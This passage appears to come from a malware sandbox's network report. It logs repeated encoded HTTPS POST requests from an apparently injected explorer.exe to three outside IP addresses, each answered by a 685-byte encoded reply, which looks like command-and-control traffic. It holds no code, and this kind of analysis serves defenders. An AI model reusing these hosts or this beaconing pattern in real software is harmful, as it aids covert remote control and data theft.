                                                          2024-07-19 11:45:55 UTC685INData Raw: 4d 39 63 31 43 68 58 45 4d 6d 73 47 2f 68 55 70 7a 61 39 4f 46 38 66 68 77 42 62 64 79 73 5a 47 6a 62 37 6a 6d 50 39 31 7a 6d 50 30 49 75 48 56 4a 2f 48 71 4e 56 68 37 76 75 51 4e 34 31 70 46 6a 5a 6c 4a 35 55 50 66 50 31 52 4b 72 41 4a 6e 73 71 34 41 56 4d 4a 51 47 67 70 54 75 7a 78 59 50 54 38 62 6c 67 4e 63 63 37 75 48 53 2f 79 54 52 73 4f 67 49 63 61 7a 74 78 63 6d 74 41 73 65 56 4a 75 73 56 6f 79 35 47 34 79 2b 78 6c 73 54 58 73 68 34 4e 64 4d 6b 63 4a 6d 53 36 4c 64 44 4f 49 57 2b 61 74 78 41 6f 42 34 61 6b 4b 37 7a 46 6d 52 30 38 76 2b 5a 36 76 7a 61 56 2b 5a 6f 6d 39 54 36 59 37 2b 39 30 56 5a 6e 62 72 78 76 61 6d 44 59 72 75 50 4b 73 51 67 75 43 2f 31 4e 72 4f 42 68 70 5a 54 4b 6e 76 4e 30 38 54 36 55 52 34 4d 66 4c 43 45 78 6b 43 4d 71 71 37 64
                                                          Data Ascii: M9c1ChXEMmsG/hUpza9OF8fhwBbdysZGjb7jmP91zmP0IuHVJ/HqNVh7vuQN41pFjZlJ5UPfP1RKrAJnsq4AVMJQGgpTuzxYPT8blgNcc7uHS/yTRsOgIcaztxcmtAseVJusVoy5G4y+xlsTXsh4NdMkcJmS6LdDOIW+atxAoB4akK7zFmR08v+Z6vzaV+Zom9T6Y7+90VZnbrxvamDYruPKsQguC/1NrOBhpZTKnvN08T6UR4MfLCExkCMqq7d


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.557848167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:55 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:55 UTC1122OUTData Raw: 71 47 57 76 4b 44 6d 34 4f 34 32 50 54 55 6d 71 32 77 42 37 63 49 55 4b 79 44 73 59 43 66 75 33 4a 61 57 62 50 37 35 79 56 6e 30 4f 48 6b 4f 57 58 47 32 58 6c 75 51 77 6e 2f 31 63 4a 43 54 33 4a 53 76 70 36 58 57 30 44 56 6d 4b 4d 31 75 49 63 48 44 66 59 4d 44 48 63 4a 50 49 56 52 51 74 6b 6d 50 39 42 37 79 68 4d 43 70 74 31 54 58 62 4a 46 30 69 42 35 35 4e 39 6f 4d 76 37 4b 48 6f 35 42 48 6d 41 48 51 77 4d 38 6d 2b 66 78 36 46 65 76 51 30 39 46 77 66 72 59 4e 65 41 32 55 4b 56 5a 45 41 38 62 4b 38 63 58 63 46 39 58 55 4d 5a 4c 4c 53 63 2b 6c 35 64 65 4c 67 63 72 48 52 69 4b 38 64 76 74 46 78 74 46 49 36 66 54 47 55 66 6c 43 48 59 6c 41 4b 4f 51 63 4d 70 4b 41 6a 72 52 33 52 69 52 4a 74 50 48 6e 73 7a 63 4b 63 72 65 4d 41 4c 79 6d 2b 6d 78 75 52 4b 34 2f
                                                          Data Ascii: qGWvKDm4O42PTUmq2wB7cIUKyDsYCfu3JaWbP75yVn0OHkOWXG2XluQwn/1cJCT3JSvp6XW0DVmKM1uIcHDfYMDHcJPIVRQtkmP9B7yhMCpt1TXbJF0iB55N9oMv7KHo5BHmAHQwM8m+fx6FevQ09FwfrYNeA2UKVZEA8bK8cXcF9XUMZLLSc+l5deLgcrHRiK8dvtFxtFI6fTGUflCHYlAKOQcMpKAjrR3RiRJtPHnszcKcreMALym+mxuRK4/
                                                          2024-07-19 11:45:57 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:56 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:57 UTC685INData Raw: 35 38 6c 76 61 4e 4a 69 58 56 31 61 59 42 51 45 5a 4c 57 39 77 69 62 78 75 62 42 59 4f 5a 32 6c 69 39 51 2f 79 76 48 74 42 50 74 2f 45 72 75 4a 47 46 63 66 79 43 41 41 45 51 37 6e 6c 4d 68 76 70 51 36 53 38 72 50 33 70 4f 6a 53 51 67 65 75 6d 67 31 34 75 2f 50 6e 6b 39 4a 6c 46 58 71 5a 44 65 48 31 4f 74 30 46 6b 4e 72 6b 42 6f 33 4b 63 58 4d 4c 4c 4e 75 65 4f 67 56 6c 54 67 38 61 2f 44 46 76 54 67 37 4d 6b 45 6b 62 6e 55 71 6c 4f 51 6f 30 4f 2f 49 52 4d 75 50 44 4f 65 73 41 70 71 75 52 55 59 33 51 34 4d 31 48 6a 36 33 51 44 65 64 58 74 7a 4e 6a 45 31 75 68 53 2b 36 2f 50 2b 6d 36 55 4f 42 31 33 30 55 58 2f 79 77 30 66 30 54 77 44 50 70 36 45 66 72 32 75 32 68 51 4a 2f 69 44 77 59 57 6c 51 6e 39 4b 79 6d 36 63 51 71 75 58 36 73 63 41 74 5a 51 4a 36 34 48
                                                          Data Ascii: 58lvaNJiXV1aYBQEZLW9wibxubBYOZ2li9Q/yvHtBPt/EruJGFcfyCAAEQ7nlMhvpQ6S8rP3pOjSQgeumg14u/Pnk9JlFXqZDeH1Ot0FkNrkBo3KcXMLLNueOgVlTg8a/DFvTg7MkEkbnUqlOQo0O/IRMuPDOesApquRUY3Q4M1Hj63QDedXtzNjE1uhS+6/P+m6UOB130UX/yw0f0TwDPp6Efr2u2hQJ/iDwYWlQn9Kym6cQquX6scAtZQJ64H


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          49192.168.2.557849107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:57 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:57 UTC1122OUTData Raw: 69 30 35 57 67 79 49 57 74 54 39 58 65 43 68 54 57 76 6e 4a 5a 59 6a 58 78 2f 72 48 6b 56 64 59 7a 4b 4f 6c 53 44 79 67 6d 61 64 52 62 32 37 63 6b 6a 4f 52 79 34 4c 2f 32 34 4a 6b 61 6f 66 30 6f 62 62 47 31 43 30 47 4c 46 36 53 50 34 49 51 66 51 49 43 38 7a 6e 6c 2f 6f 45 33 4a 48 2f 69 61 30 6c 79 6f 64 4e 43 37 67 79 50 75 64 57 43 7a 4a 62 30 7a 4a 63 57 39 76 34 48 30 36 51 2b 46 49 4d 6e 36 4c 38 6a 49 6e 6e 71 55 36 36 51 43 6a 59 70 44 48 38 52 39 64 71 4b 57 39 73 42 78 72 73 57 72 61 32 41 36 38 48 6f 6b 39 67 50 78 32 78 59 62 35 6a 31 4c 46 4a 31 53 72 54 43 63 67 4a 56 33 54 4b 46 68 30 73 6d 4a 59 57 6b 54 39 34 42 6e 56 38 63 6f 34 7a 6e 2b 59 46 6b 43 6b 58 57 43 31 37 39 52 68 44 63 6f 43 56 34 50 42 30 36 45 71 36 7a 5a 48 32 31 68 58 5a
                                                          Data Ascii: i05WgyIWtT9XeChTWvnJZYjXx/rHkVdYzKOlSDygmadRb27ckjORy4L/24Jkaof0obbG1C0GLF6SP4IQfQIC8znl/oE3JH/ia0lyodNC7gyPudWCzJb0zJcW9v4H06Q+FIMn6L8jInnqU66QCjYpDH8R9dqKW9sBxrsWra2A68Hok9gPx2xYb5j1LFJ1SrTCcgJV3TKFh0smJYWkT94BnV8co4zn+YFkCkXWC179RhDcoCV4PB06Eq6zZH21hXZ
                                                          2024-07-19 11:45:58 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:58 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:58 UTC685INData Raw: 6d 46 54 39 57 32 4b 31 74 67 34 52 75 47 41 41 4c 68 6c 4f 69 63 78 42 44 7a 5a 44 79 66 36 57 7a 57 4f 58 4d 59 52 33 44 4f 31 6f 54 6a 58 68 61 74 32 71 4b 37 37 33 35 6c 4d 65 4b 41 37 78 6a 6e 57 52 78 49 76 70 6c 46 63 36 2f 58 76 73 42 75 69 33 75 75 77 69 61 59 78 54 6b 78 68 62 6a 49 41 73 66 6f 39 6e 6d 4b 4f 67 34 53 2f 57 55 67 7a 46 51 2f 57 6c 65 46 42 67 68 52 6e 30 46 67 7a 4f 70 4d 74 54 37 53 4e 6f 74 31 71 4e 72 79 47 4b 53 6f 65 6f 30 51 56 45 32 36 70 32 4e 6e 78 65 72 74 2f 62 44 44 38 6f 63 64 44 39 76 6e 7a 74 42 45 68 56 77 70 66 31 49 36 51 69 32 47 35 44 70 39 77 30 39 47 36 35 45 67 42 33 79 36 6b 63 69 49 74 43 6e 68 46 66 61 52 56 34 53 76 46 64 32 48 42 4b 6c 70 37 70 78 2f 4d 79 54 67 72 35 38 79 4e 5a 55 6d 2b 35 6e 44 4c
                                                          Data Ascii: mFT9W2K1tg4RuGAALhlOicxBDzZDyf6WzWOXMYR3DO1oTjXhat2qK7735lMeKA7xjnWRxIvplFc6/XvsBui3uuwiaYxTkxhbjIAsfo9nmKOg4S/WUgzFQ/WleFBghRn0FgzOpMtT7SNot1qNryGKSoeo0QVE26p2Nnxert/bDD8ocdD9vnztBEhVwpf1I6Qi2G5Dp9w09G65EgB3y6kciItCnhFfaRV4SvFd2HBKlp7px/MyTgr58yNZUm+5nDL


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          50192.168.2.557851107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:59 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:59 UTC1122OUTData Raw: 55 72 75 48 76 62 57 67 61 43 33 74 51 44 30 48 39 34 75 6d 54 67 48 53 31 76 44 46 33 4b 77 41 52 48 74 32 6a 30 72 2f 69 6e 32 4e 65 7a 63 50 47 55 49 35 78 55 6d 54 33 44 6f 36 69 6b 79 47 41 4a 4a 52 72 37 77 2b 46 48 46 61 4e 54 73 59 62 53 65 73 2b 39 39 6a 6f 41 48 66 43 44 6a 70 64 35 49 37 52 30 79 48 64 4c 76 43 70 47 79 35 45 4d 76 61 32 46 6a 55 51 76 68 36 34 41 45 6b 53 74 31 66 77 54 5a 4f 50 64 59 7a 68 52 44 50 71 75 74 41 63 6c 46 6b 58 50 4e 4e 47 42 4b 2f 52 4e 76 70 55 53 41 79 75 59 48 68 61 71 65 36 44 58 4a 54 6e 6f 77 34 33 33 6d 76 66 64 74 4e 57 75 54 78 58 74 69 4f 36 67 37 73 2f 65 78 36 47 71 43 34 76 2b 75 61 5a 65 5a 41 75 77 5a 76 58 6b 67 31 56 72 30 36 57 35 6b 53 67 58 79 49 50 75 6d 50 74 4d 74 41 57 2b 6f 56 74 73 59
                                                          Data Ascii: UruHvbWgaC3tQD0H94umTgHS1vDF3KwARHt2j0r/in2NezcPGUI5xUmT3Do6ikyGAJJRr7w+FHFaNTsYbSes+99joAHfCDjpd5I7R0yHdLvCpGy5EMva2FjUQvh64AEkSt1fwTZOPdYzhRDPqutAclFkXPNNGBK/RNvpUSAyuYHhaqe6DXJTnow433mvfdtNWuTxXtiO6g7s/ex6GqC4v+uaZeZAuwZvXkg1Vr06W5kSgXyIPumPtMtAW+oVtsY
                                                          2024-07-19 11:46:01 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:00 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:01 UTC685INData Raw: 48 4d 76 6d 74 52 43 58 52 5a 76 6c 46 30 71 69 58 41 56 4d 7a 77 63 79 54 74 41 74 36 79 41 69 2f 56 64 61 33 61 6c 39 63 73 6e 48 56 73 37 56 57 36 39 79 33 51 55 67 66 53 4b 5a 49 30 75 79 72 56 61 33 76 62 47 38 69 74 47 36 73 35 72 2f 59 70 71 77 75 79 68 39 73 75 7a 63 44 43 61 31 56 31 7a 39 7a 33 71 62 66 59 4e 36 54 56 55 6c 76 49 50 44 77 54 4a 46 54 6d 78 63 64 78 68 2b 55 62 35 6e 5a 59 67 47 30 56 4a 44 75 55 6d 37 48 4d 42 57 70 57 49 67 4b 78 38 43 79 34 41 64 45 34 47 5a 53 36 33 63 45 2b 78 38 75 5a 62 34 63 59 7a 75 75 63 4c 71 45 74 6d 78 31 54 70 65 64 47 69 52 50 4a 67 78 31 4e 30 37 56 66 63 71 57 52 4f 58 39 6c 31 44 57 39 74 4e 67 53 56 50 72 6b 46 41 70 4c 47 56 71 43 59 4a 72 41 69 47 2f 57 64 2f 6b 6c 58 77 34 4d 63 5a 58 5a 75
                                                          Data Ascii: HMvmtRCXRZvlF0qiXAVMzwcyTtAt6yAi/Vda3al9csnHVs7VW69y3QUgfSKZI0uyrVa3vbG8itG6s5r/Ypqwuyh9suzcDCa1V1z9z3qbfYN6TVUlvIPDwTJFTmxcdxh+Ub5nZYgG0VJDuUm7HMBWpWIgKx8Cy4AdE4GZS63cE+x8uZb4cYzuucLqEtmx1TpedGiRPJgx1N07VfcqWROX9l1DW9tNgSVPrkFApLGVqCYJrAiG/Wd/klXw4McZXZu


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          51192.168.2.557852167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:01 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:46:01 UTC1267OUTData Raw: 4d 4b 6a 67 5a 70 58 6a 63 4e 33 74 67 7a 6d 54 44 59 6b 64 76 30 55 7a 43 57 67 5a 72 6d 34 49 67 4a 57 4d 4a 49 69 46 32 53 55 4a 38 45 42 66 45 6a 63 66 79 41 4b 2f 78 76 45 6d 71 2f 66 73 4c 49 30 46 35 73 74 5a 69 79 2f 6b 6b 41 65 36 50 74 54 49 33 47 63 4f 57 66 74 70 64 49 55 4f 67 52 33 6c 69 78 37 49 62 52 4d 7a 4f 45 58 41 2b 64 69 61 45 72 63 43 48 42 59 52 6c 47 44 6a 62 35 59 56 75 38 41 78 67 62 31 33 54 75 43 79 4b 66 52 75 41 68 38 69 74 75 35 6a 75 36 32 74 36 6b 71 52 67 6f 4e 68 64 56 4d 6b 32 66 54 4c 4e 63 6a 47 35 75 68 6e 63 68 31 56 45 37 6f 49 76 62 54 75 76 4c 56 56 73 54 34 58 41 78 43 69 36 4f 62 35 30 43 76 4e 77 54 61 72 76 78 35 59 72 4f 38 64 6e 73 32 79 43 6d 6a 6c 4f 74 6b 46 6b 46 48 32 2b 4f 61 53 64 6e 36 70 75 50 77
                                                          Data Ascii: MKjgZpXjcN3tgzmTDYkdv0UzCWgZrm4IgJWMJIiF2SUJ8EBfEjcfyAK/xvEmq/fsLI0F5stZiy/kkAe6PtTI3GcOWftpdIUOgR3lix7IbRMzOEXA+diaErcCHBYRlGDjb5YVu8Axgb13TuCyKfRuAh8itu5ju62t6kqRgoNhdVMk2fTLNcjG5uhnch1VE7oIvbTuvLVVsT4XAxCi6Ob50CvNwTarvx5YrO8dns2yCmjlOtkFkFH2+OaSdn6puPw
                                                          2024-07-19 11:46:02 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:02 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:02 UTC685INData Raw: 74 36 6b 35 6b 67 58 52 55 76 4b 52 53 77 50 6b 65 4f 58 74 4d 47 45 43 55 37 71 4a 53 44 35 37 42 61 48 74 64 72 4e 74 6b 6e 69 46 69 46 63 49 62 4f 65 50 36 55 73 57 65 38 68 2f 36 43 46 32 52 38 77 5a 57 48 51 30 58 54 57 4e 68 66 6b 30 6c 59 46 59 6f 41 6c 2f 52 6e 74 4c 4b 68 71 48 6d 31 55 50 69 34 6a 51 54 61 57 61 6b 61 4d 37 36 32 46 64 53 2f 49 70 55 56 50 32 67 42 39 49 63 6d 4a 78 70 67 36 64 6e 52 43 6b 41 76 73 77 71 6b 4b 79 57 44 72 31 62 2f 74 51 70 62 71 46 34 74 44 6b 57 38 39 45 41 38 47 75 38 61 75 52 44 73 47 34 47 48 59 43 76 78 52 49 4c 66 2f 4b 4c 39 57 57 41 31 4d 78 53 4a 39 30 6d 7a 4e 76 65 43 49 33 32 43 62 33 2f 58 62 6c 66 4a 47 69 63 44 6f 45 5a 39 62 4e 5a 6a 49 73 58 57 44 37 42 4f 41 79 75 35 79 4a 71 49 2f 4f 4f 72 5a
                                                          Data Ascii: t6k5kgXRUvKRSwPkeOXtMGECU7qJSD57BaHtdrNtkniFiFcIbOeP6UsWe8h/6CF2R8wZWHQ0XTWNhfk0lYFYoAl/RntLKhqHm1UPi4jQTaWakaM762FdS/IpUVP2gB9IcmJxpg6dnRCkAvswqkKyWDr1b/tQpbqF4tDkW89EA8Gu8auRDsG4GHYCvxRILf/KL9WWA1MxSJ90mzNveCI32Cb3/XblfJGicDoEZ9bNZjIsXWD7BOAyu5yJqI/OOrZ


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          52192.168.2.557853107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:03 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:03 UTC1122OUTData Raw: 6d 50 42 70 50 37 48 64 2b 54 61 56 35 39 35 69 6e 6c 4e 68 31 65 56 74 56 4c 4b 77 70 47 68 41 6f 6b 69 38 4f 4c 57 37 41 4e 48 50 44 77 74 76 4d 33 45 42 30 74 64 4c 66 45 2b 35 68 4c 75 4a 54 77 55 44 42 6f 75 30 71 6f 6a 35 69 50 56 48 72 36 33 79 4c 6b 41 4a 69 6b 59 58 6a 64 4f 43 51 69 63 79 62 53 52 46 50 41 4a 47 68 31 52 6e 76 62 65 31 70 46 56 50 74 70 56 67 59 6c 6f 47 57 70 53 2b 31 31 39 4f 6d 2f 34 57 37 62 61 53 6b 34 38 2b 68 50 79 36 64 47 76 36 48 4f 30 73 41 56 31 73 42 65 62 46 47 31 72 6a 56 56 42 78 78 77 43 67 4b 4e 37 54 33 43 41 34 38 34 57 51 36 48 70 30 62 49 5a 30 39 46 6a 75 63 68 5a 46 39 52 72 57 55 46 45 33 58 58 44 48 51 70 34 65 47 71 36 6b 32 57 78 48 47 36 65 71 46 37 47 69 6b 30 61 6e 2f 6c 35 6e 38 31 74 78 44 6c 71
                                                          Data Ascii: mPBpP7Hd+TaV595inlNh1eVtVLKwpGhAoki8OLW7ANHPDwtvM3EB0tdLfE+5hLuJTwUDBou0qoj5iPVHr63yLkAJikYXjdOCQicybSRFPAJGh1Rnvbe1pFVPtpVgYloGWpS+119Om/4W7baSk48+hPy6dGv6HO0sAV1sBebFG1rjVVBxxwCgKN7T3CA484WQ6Hp0bIZ09FjuchZF9RrWUFE3XXDHQp4eGq6k2WxHG6eqF7Gik0an/l5n81txDlq
                                                          2024-07-19 11:46:04 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:04 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:04 UTC685INData Raw: 50 43 37 77 75 4d 50 6c 6b 46 39 41 6b 31 45 44 65 42 32 70 48 6a 2b 73 49 65 71 4c 6d 6f 2f 42 6f 35 33 79 4f 77 41 4b 72 47 4f 62 48 65 37 34 45 6d 70 79 6c 6f 6d 67 32 6a 48 6c 4d 45 67 67 51 57 77 4c 62 70 71 76 38 63 36 48 69 36 57 70 45 7a 73 6c 2f 58 47 4c 64 75 68 4e 63 4d 70 59 70 35 70 76 4a 38 49 55 6d 4e 58 37 36 6c 64 77 35 4e 74 31 53 41 53 65 79 39 44 71 53 64 68 4a 6e 38 70 2f 36 7a 4f 39 6f 78 41 68 76 72 65 59 62 47 68 72 6f 7a 2f 76 55 56 71 46 75 41 64 4e 52 6a 2f 6d 61 57 4c 43 4e 78 59 6f 5a 67 75 54 39 59 47 45 57 45 2b 33 50 66 31 6a 79 4a 38 73 74 5a 71 79 76 5a 55 74 66 48 45 34 64 30 51 48 76 72 71 49 42 76 6d 38 6f 70 66 46 64 2f 49 49 57 4b 57 6d 69 6c 77 4f 74 38 52 77 4f 6e 39 59 61 6a 76 6f 57 76 64 67 47 4b 30 36 71 4a 41
                                                          Data Ascii: PC7wuMPlkF9Ak1EDeB2pHj+sIeqLmo/Bo53yOwAKrGObHe74Empylomg2jHlMEggQWwLbpqv8c6Hi6WpEzsl/XGLduhNcMpYp5pvJ8IUmNX76ldw5Nt1SASey9DqSdhJn8p/6zO9oxAhvreYbGhroz/vUVqFuAdNRj/maWLCNxYoZguT9YGEWE+3Pf1jyJ8stZqyvZUtfHE4d0QHvrqIBvm8opfFd/IIWKWmilwOt8RwOn9YajvoWvdgGK06qJA


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          53192.168.2.557855107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:05 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:05 UTC1122OUTData Raw: 6e 6c 59 36 50 71 57 53 4e 54 73 42 55 31 45 4f 4f 56 54 58 66 36 43 4e 4b 65 4f 4a 66 52 76 4c 64 69 55 45 37 65 65 36 76 31 45 66 41 52 70 70 6d 69 32 53 78 47 4b 4c 4f 49 4f 36 4e 2b 71 58 6c 38 77 57 41 6a 54 74 66 45 57 47 5a 44 44 63 69 52 57 50 6d 30 74 47 2f 43 34 49 58 78 5a 35 76 56 7a 63 6a 6d 46 4c 69 5a 55 65 37 2f 48 30 35 4f 70 4d 79 38 54 58 71 30 59 68 54 55 31 53 5a 69 79 63 79 6d 74 6d 57 53 73 71 6b 46 65 69 45 39 6b 69 77 6f 6f 63 5a 50 78 50 2f 43 4a 69 51 6e 64 37 59 34 51 32 66 59 4c 71 69 67 6d 5a 50 2b 62 4e 61 35 47 74 46 6d 37 62 66 6d 46 7a 45 68 30 39 51 75 4c 6f 49 62 31 50 51 47 2f 53 47 66 6b 52 51 36 51 31 4c 43 6d 77 76 72 70 69 56 49 56 34 73 65 49 54 66 47 61 48 34 37 50 41 6b 32 7a 42 41 75 31 78 32 6b 6d 51 31 4f 62
                                                          Data Ascii: nlY6PqWSNTsBU1EOOVTXf6CNKeOJfRvLdiUE7ee6v1EfARppmi2SxGKLOIO6N+qXl8wWAjTtfEWGZDDciRWPm0tG/C4IXxZ5vVzcjmFLiZUe7/H05OpMy8TXq0YhTU1SZiycymtmWSsqkFeiE9kiwoocZPxP/CJiQnd7Y4Q2fYLqigmZP+bNa5GtFm7bfmFzEh09QuLoIb1PQG/SGfkRQ6Q1LCmwvrpiVIV4seITfGaH47PAk2zBAu1x2kmQ1Ob
                                                          2024-07-19 11:46:07 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:06 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:07 UTC685INData Raw: 52 49 6c 6f 37 42 4b 46 63 31 47 33 78 62 57 54 57 39 79 65 68 37 77 6c 68 55 4e 70 53 64 51 4f 42 33 32 32 41 47 76 30 4d 53 47 4e 2f 6e 68 79 66 6b 33 2f 42 59 2b 41 6b 4a 41 6a 33 6a 47 79 56 36 61 6b 55 65 30 62 54 78 63 44 6b 59 71 78 6c 6d 51 76 79 6b 6e 6b 38 4b 46 49 74 51 31 54 46 33 76 55 53 71 62 73 33 63 6b 69 6e 73 44 70 7a 4c 6c 7a 73 46 32 6a 58 52 30 54 31 47 59 35 54 7a 78 39 4f 52 4e 4c 2f 4f 66 46 4c 33 52 44 49 7a 70 55 5a 6e 48 75 77 44 47 35 67 65 78 45 41 58 75 53 5a 63 59 66 72 6e 71 76 52 57 42 6a 73 47 7a 6b 2f 57 37 37 49 48 76 75 43 79 6a 78 39 50 5a 39 56 4f 43 44 49 64 50 47 61 48 61 44 30 79 43 68 69 51 4d 75 58 65 54 61 30 4c 5a 44 56 63 71 6b 32 4f 75 61 4a 7a 43 6b 76 71 76 57 72 54 73 6b 76 33 42 77 33 49 53 78 4a 66 37
                                                          Data Ascii: RIlo7BKFc1G3xbWTW9yeh7wlhUNpSdQOB322AGv0MSGN/nhyfk3/BY+AkJAj3jGyV6akUe0bTxcDkYqxlmQvyknk8KFItQ1TF3vUSqbs3ckinsDpzLlzsF2jXR0T1GY5Tzx9ORNL/OfFL3RDIzpUZnHuwDG5gexEAXuSZcYfrnqvRWBjsGzk/W77IHvuCyjx9PZ9VOCDIdPGaHaD0yChiQMuXeTa0LZDVcqk2OuaJzCkvqvWrTskv3Bw3ISxJf7


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          54192.168.2.557856167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:07 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:46:07 UTC1267OUTData Raw: 48 6f 39 37 73 65 33 36 33 36 37 53 47 6e 52 67 67 31 2f 75 56 5a 70 6f 68 4b 66 53 32 4e 44 6c 36 65 36 6a 72 51 4e 7a 44 66 4f 38 36 6d 32 31 62 56 47 32 39 59 74 39 71 4a 4c 65 34 71 61 65 70 79 4f 48 6d 77 63 73 78 73 45 72 49 59 51 61 4f 75 76 76 6f 2b 6b 2f 76 78 67 4a 72 50 68 52 4e 69 45 50 47 6e 57 59 79 70 67 6c 54 78 71 4d 2b 6d 53 43 6b 59 36 57 75 54 43 30 70 4c 42 2f 6e 50 76 38 45 43 70 57 48 38 67 33 66 6b 51 72 77 45 31 67 76 39 77 44 74 30 4b 59 59 50 48 30 74 64 58 7a 49 66 35 67 79 6c 61 61 2b 46 49 48 77 56 62 72 38 39 6d 34 47 49 2f 71 6e 6b 38 4f 58 71 6e 4d 4b 45 4a 44 51 2b 56 56 4a 57 55 51 4c 7a 6d 65 64 7a 56 34 6c 70 38 57 31 73 47 68 57 35 37 64 6a 2f 69 4f 32 6c 78 68 69 59 52 50 6e 65 33 4d 65 7a 74 43 70 51 77 6a 58 59 4d
                                                          Data Ascii: Ho97se36367SGnRgg1/uVZpohKfS2NDl6e6jrQNzDfO86m21bVG29Yt9qJLe4qaepyOHmwcsxsErIYQaOuvvo+k/vxgJrPhRNiEPGnWYypglTxqM+mSCkY6WuTC0pLB/nPv8ECpWH8g3fkQrwE1gv9wDt0KYYPH0tdXzIf5gylaa+FIHwVbr89m4GI/qnk8OXqnMKEJDQ+VVJWUQLzmedzV4lp8W1sGhW57dj/iO2lxhiYRPne3MeztCpQwjXYM
                                                          2024-07-19 11:46:08 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:08 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
